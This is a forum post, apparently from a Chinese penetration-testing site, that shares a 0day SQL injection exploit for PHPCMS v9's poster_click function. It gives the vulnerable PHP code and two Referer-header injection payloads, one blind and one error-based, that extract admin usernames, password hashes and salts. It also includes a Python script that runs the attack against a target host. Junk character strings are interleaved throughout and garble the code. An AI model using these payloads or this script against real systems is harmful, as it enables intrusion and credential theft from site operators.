中国网络渗透测试联盟

标题: phpcms post_click注入0day利用代码 [打印本页]

---

作者: admin    时间: 2013-1-11 21:01
标题: phpcms post_click注入0day利用代码
有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
5 F# }& A! v/ V1 _" o
. r7 v6 J0 {: m/ g问题函数\phpcms\modules\poster\index.php
' {9 S6 ?$ F5 C" W
public function poster_click() {
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
$ \( L8 m: M* |1 {1 g* W+ a$r = $this->db->get_one(array('id'=>$id));
3 y9 P/ V& G3 W* Oif (!is_array($r) && empty($r)) return false;
4 ]3 Z+ j/ `+ t" v3 o$ip_area = pc_base::load_sys_class('ip_area');
( [- s+ |5 }6 h+ x$ip = ip();
$area = $ip_area->get($ip);
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
if($id) {
  Y8 `1 y* l3 z1 O- ~$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
% F8 P% U2 m: @  d0 ~( w$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
}
' |6 F8 H  D' N, b, [- n$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
$setting = string2array($r['setting']);
4 A- M9 F3 v. }if (count($setting)==1) {
$url = $setting['1']['linkurl'];
} else {
4 i) Z( E: j0 |9 H+ h9 Q6 Y2 [$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
}
. w- z, Y0 r; C) Q- y9 dheader('Location: '.$url);
. Z; @2 y2 G1 {8 C% }4 e}
( C* A9 W- M8 i1 S# v
6 v1 p8 x3 g! {: d( T3 s
+ q& d+ m. V+ ?) T1 Q
) w( w. T) O4 o. v! e2 n" @: |利用方式：

1 g, h( f& a7 E: q% Q! o1 H1、可以采用盲注入的手法：
. m9 U1 @$ Y2 ?
0 a+ N$ J% J  P/ u+ ~referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#

" S. T' n8 F) q. J! V通过返回页面，正常与否一个个猜解密码字段。

  P* K4 W( I4 f5 n# d7 C2、代码是花开写的，随手附上了：

1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#

此方法是爆错注入手法，原理自查。
# x' _$ E3 g1 V5 K

! K  ]  K8 E) o# i' A9 i
  q9 p9 v* [' l, I& |利用程序:

#!/usr/bin/env python
import httplib,sys,re
# ]5 c1 k* H0 ~1 C2 A
/ ]0 d4 y2 O" c; [. _/ T% k- vdef attack():
print “Code by Pax.Mac Team conqu3r!”
& T: e! }4 u, W. O+ ~+ N$ Fprint “Welcome to our zone!!!”
4 ^- J" H5 v+ ourl=sys.argv[1]
! H; t! y) _- e" ?( W/ epaths=sys.argv[2]
- S  F/ L7 `2 @; E1 s8 Aconn = httplib.HTTPConnection(url)
8 }+ k7 e1 {5 B1 R/ W/ li_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
: c. Z7 D( _, Q! g  w" `, r“Accept”: “text/plain”,
# K! E4 D8 G! P5 v! @% C“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
r1 = conn.getresponse()
# L( l$ k" C) b4 I9 z6 ~8 C' Pdatas=r1.read()
+ B8 [: d& Y% G3 u4 o, Ddatas=re.findall(r”Duplicate entry \’\w+’”, datas)
& m- u4 c: L: T9 e/ e7 z& C9 zprint datas[0]
& e; d* u  T& s- H( u8 econn.close()
if __name__==”__main__”:
if len(sys.argv)<3:
print “Code by Pax.Mac Team conqu3r”
print “Usgae:”
; Q) d3 V; L& \, e, A$ g' Qprint “    phpcmsattack.py   www.paxmac.org /”
print “    phpcmsataack.py   www.paxmac.org /phpcmsv9/”
7 i' ?4 ]# u: x8 b& R1 Ssys.exit(1)
attack()
+ o& L/ w$ _3 N& G6 V2 M& M. @+ J

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2